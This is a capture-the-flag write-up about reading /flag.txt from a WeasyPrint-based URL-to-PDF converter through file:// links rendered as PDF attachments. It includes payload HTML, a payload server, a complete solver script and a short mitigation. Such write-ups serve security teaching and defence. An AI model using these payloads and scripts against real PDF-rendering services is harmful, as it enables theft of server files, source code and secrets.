Challenge: Web 2 Doc 2
Category: Web
Overview
Web 2 Doc 2 is a URL-to-PDF converter web application. Users submit a URL, solve a text-based CAPTCHA, and receive a PDF rendering of the target webpage. Under the hood, the application uses WeasyPrint 68.1 to convert fetched HTML into PDF documents.
The goal is to read the contents of /flag.txt on the server.
Reconnaissance
Identifying the Stack
Submitting a valid URL (e.g., https://example.com) and inspecting the resulting PDF reveals the producer:
```
Producer: WeasyPrint 68.1
```
The application is a Flask app running Python 3.11. This was confirmed later, once the exploit described below was working, via AWS metadata and /proc/self/cmdline.
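Both fingerprinting steps can be reproduced with two small standard-library helpers. The first pulls the /Producer entry out of the raw PDF bytes. The second decodes /proc/self/cmdline, whose arguments are NUL-separated, once arbitrary file reads are possible. This is a sketch: pdf_producer and parse_cmdline are hypothetical names. The regex also assumes the document information dictionary is stored uncompressed as a literal string such as /Producer (WeasyPrint 68.1). A full parser such as pypdf (PdfReader(...).metadata.producer) is more robust.

```python
import re
from typing import Optional


def pdf_producer(pdf_bytes: bytes) -> Optional[str]:
    """Return the /Producer value, assuming an uncompressed literal string."""
    match = re.search(rb"/Producer\s*\(([^)]*)\)", pdf_bytes)
    return match.group(1).decode("latin-1") if match else None


def parse_cmdline(raw: bytes) -> list[str]:
    """Split /proc/<pid>/cmdline contents into arguments.

    Arguments are NUL-separated and the data ends with a NUL, so the trailing
    empty element is filtered out (as are any genuinely empty arguments).
    """
    return [arg.decode(errors="replace") for arg in raw.split(b"\0") if arg]
```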
Application Flow
- User visits / and receives a page with a random 6-character alphanumeric CAPTCHA (e.g., X1QPNX).
- User submits a URL and the CAPTCHA answer to POST /convert.
- The server validates the CAPTCHA, fetches the URL using python-requests (with allow_redirects=False and an X-Fetcher: Internal header), and passes the HTML to WeasyPrint for PDF conversion.
- The generated PDF is returned to the user.
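The CAPTCHA offers no protection against automation, because its answer is sent to the client as plain text inside the page markup. The sketch below pairs a hypothetical generator with the scraper used by the solver script. The real CAPTCHA helpers are elided in the recovered source, so generate_captcha and its uppercase-plus-digits alphabet are assumptions based only on the sample X1QPNX and the fact that the app imports secrets and string.

```python
import re
import secrets
import string
from typing import Optional

# Assumption: uppercase letters and digits, matching the sample "X1QPNX".
ALPHABET = string.ascii_uppercase + string.digits


def generate_captcha(length: int = 6) -> str:
    """Hypothetical server-side generator for a random alphanumeric CAPTCHA."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def scrape_captcha(page_html: str) -> Optional[str]:
    """Recover the answer from the page, as the solver script does."""
    match = re.search(r'class="captcha-display">([^<]+)</div>', page_html)
    return match.group(1).strip() if match else None
```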
Source Code (recovered via the exploit itself)
Using the vulnerability described below, the full application source at /app/app.py was extracted. The relevant parts are:
```python
from flask import Flask, render_template, request, send_file, jsonify, session
import requests
from weasyprint import HTML, default_url_fetcher
import io
import os
import ipaddress
from urllib.parse import urlparse
import secrets
import string

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

# ...captcha and helper functions...

@app.route('/convert', methods=['POST'])
def convert():
    url = request.form.get('url', '').strip()
    captcha_answer = request.form.get('captcha_answer', '').strip()
    # ...captcha validation...
    try:
        html_content = fetch_url_with_limit(url)
        pdf_file = SizeLimitedBytesIO()
        HTML(string=html_content).write_pdf(pdf_file)  # <-- NO custom url_fetcher!
        pdf_file.seek(0)
        return send_file(pdf_file, mimetype='application/pdf', ...)
    except Exception as e:
        return jsonify({'error': f'Failed to convert to PDF'}), 500
```
The critical line is:
```python
HTML(string=html_content).write_pdf(pdf_file)
```
No custom url_fetcher is provided, so WeasyPrint falls back to its default url_fetcher, which handles file://, data:, and http(s):// URLs without restriction.
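To make the root cause concrete, here is a minimal sketch of the kind of restriction that is missing: a wrapper that refuses any scheme other than http(s) before delegating to WeasyPrint's default fetcher. The names is_allowed_url and restricted_url_fetcher are hypothetical. The sketch assumes the function-style url_fetcher accepted by HTML(..., url_fetcher=...). Check the documentation for your WeasyPrint release, because the fetcher interface has evolved across versions. Blocking data: also breaks inline data URIs, and the wrapper does nothing about SSRF through http(s) resources.

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def is_allowed_url(url: str) -> bool:
    """Allow only http(s) URLs; file:, data: and any other scheme are rejected."""
    return urlparse(url).scheme.lower() in ALLOWED_SCHEMES


def restricted_url_fetcher(url, *args, **kwargs):
    """Refuse non-http(s) URLs, otherwise delegate to WeasyPrint's default fetcher."""
    if not is_allowed_url(url):
        raise ValueError(f"Blocked URL scheme: {url!r}")
    # Imported lazily so the scheme check works even without WeasyPrint installed.
    from weasyprint import default_url_fetcher
    return default_url_fetcher(url, *args, **kwargs)


# Hypothetical hardened call site in /convert:
# HTML(string=html_content, url_fetcher=restricted_url_fetcher).write_pdf(pdf_file)
```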
Vulnerability
CVE-2024-28184 - WeasyPrint Arbitrary File Read via PDF Attachments
WeasyPrint supports the HTML <link rel="attachment"> tag, which embeds the referenced resource as a file attachment inside the generated PDF. When no custom url_fetcher restricts the protocols, an attacker can use file:// URIs to read arbitrary local files and have them embedded as PDF attachments.
```html
<link rel="attachment" href="file:///etc/passwd">
```
When WeasyPrint renders this HTML, it reads /etc/passwd from the local filesystem and embeds its contents as a file attachment in the PDF. The attachment can then be extracted programmatically with a PDF library such as pypdf.
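The same primitive was used to recover /app/app.py and /proc/self/cmdline. A small payload builder that emits one attachment link per absolute server path makes this repeatable. It is a sketch: build_payload is a hypothetical name. It assumes that each link element becomes its own PDF attachment, which should be verified against the returned PDF. Note that the solver's extract_attachments returns only the first attachment, so loop over reader.attachments to dump all of them.

```python
from html import escape
from urllib.parse import quote


def build_payload(*paths: str) -> str:
    """Return an HTML page with one <link rel="attachment"> per absolute path."""
    links = []
    for path in paths:
        if not path.startswith("/"):
            raise ValueError(f"expected an absolute path, got {path!r}")
        uri = "file://" + quote(path)  # "/flag.txt" -> "file:///flag.txt"
        links.append(f'<link rel="attachment" href="{escape(uri)}">')
    return "<html><head>" + "".join(links) + "</head><body><h1>pwned</h1></body></html>"
```

With a single path, build_payload("/flag.txt") produces exactly the payload string used in the solver script.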
Attack Chain
- Host a malicious HTML page on an attacker-controlled server (e.g., webhook.site).
- The HTML contains a <link rel="attachment" href="file:///flag.txt"> tag.
- Submit the attacker's URL to the converter with a valid CAPTCHA answer.
- The server fetches the HTML via python-requests (this step does not trigger the vulnerability; the file read happens later, during rendering).
- WeasyPrint processes the HTML and encounters the <link rel="attachment"> tag.
- WeasyPrint's default url_fetcher reads file:///flag.txt from the server's filesystem.
- The file contents are embedded as an attachment in the output PDF.
- Extract the attachment from the returned PDF.
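If webhook.site is unavailable, a minimal stand-in for the attacker-controlled server in the first step can be built with the standard library. This is a hypothetical sketch: PAYLOAD, PayloadHandler and serve_payload are illustrative names, and it assumes the host and port you bind are reachable from the challenge server. The handler also logs the X-Fetcher header that the converter reportedly sends, which is a quick way to confirm that a request came from the target rather than from a browser.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

PAYLOAD = (b'<html><head><link rel="attachment" href="file:///flag.txt"></head>'
           b'<body><h1>pwned</h1></body></html>')


class PayloadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the malicious HTML for every path.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def log_message(self, fmt, *args):
        # Log each request together with the X-Fetcher header, if present.
        headers = getattr(self, "headers", None)
        fetcher = headers.get("X-Fetcher") if headers else None
        print(f"[*] {self.client_address[0]} {fmt % args} X-Fetcher={fetcher}")


def serve_payload(host: str = "0.0.0.0", port: int = 8000) -> ThreadingHTTPServer:
    """Start the payload server in a background thread and return it."""
    server = ThreadingHTTPServer((host, port), PayloadHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Submit http://<your-public-host>:8000/ to the converter instead of the webhook URL, then call server.shutdown() when done.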
Exploit
Step 1: Set Up Attacker-Controlled HTML
Create a webhook.site token configured to return:
```html
<html>
<head>
  <link rel="attachment" href="file:///flag.txt">
</head>
<body>
  <h1>Web 2 Doc v2</h1>
</body>
</html>
```
Step 2: Automated Solver Script
```python
import io
import re
import sys

import requests
from pypdf import PdfReader

BASE = "http://52.59.124.14:5003"


def create_webhook(content):
    """Create a webhook.site token with custom HTML response."""
    r = requests.post("https://webhook.site/token", json={
        "default_status": 200,
        "default_content": content,
        "default_content_type": "text/html",
    }, timeout=10)
    r.raise_for_status()
    uuid = r.json()['uuid']
    return f"https://webhook.site/{uuid}"


def solve_captcha_and_convert(url):
    """Solve the text CAPTCHA and submit the URL for conversion."""
    s = requests.Session()  # reuse cookies so the CAPTCHA answer matches this session
    r = s.get(BASE + "/", timeout=15)

    # Extract the CAPTCHA text from the page
    match = re.search(r'class="captcha-display">([^<]+)</div>', r.text)
    if match is None:
        sys.exit("[-] CAPTCHA not found on the index page")
    captcha = match.group(1).strip()

    # Submit URL with solved CAPTCHA
    return s.post(BASE + "/convert", data={
        "url": url,
        "captcha_answer": captcha,
    }, timeout=60)


def extract_attachments(pdf_bytes):
    """Return (name, data) for the first file attachment in a PDF, or (None, None)."""
    reader = PdfReader(io.BytesIO(pdf_bytes))  # no temporary file needed
    for name, data_list in reader.attachments.items():
        return name, data_list[0]
    return None, None


# Payload HTML
html = '''<html><head><link rel="attachment" href="file:///flag.txt"></head><body><h1>pwned</h1></body></html>'''

webhook_url = create_webhook(html)
print(f"[*] Webhook: {webhook_url}")

r = solve_captcha_and_convert(webhook_url)
if r.status_code == 200:
    name, data = extract_attachments(r.content)
    if data:
        print(f"[+] Flag: {data.decode()}")
    else:
        print("[-] No attachment found")
else:
    print(f"[-] Conversion failed: HTTP {r.status_code}")
```
Step 3: Run and Profit
```
$ python3 solve.py
[*] Webhook: https://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
[+] Flag: ENO{weasy_pr1nt_can_h4v3_f1l3s_1n_PDF_att4chments!}
```
Flag
ENO{weasy_pr1nt_can_h4v3_f1l3s_1n_PDF_att4chments!}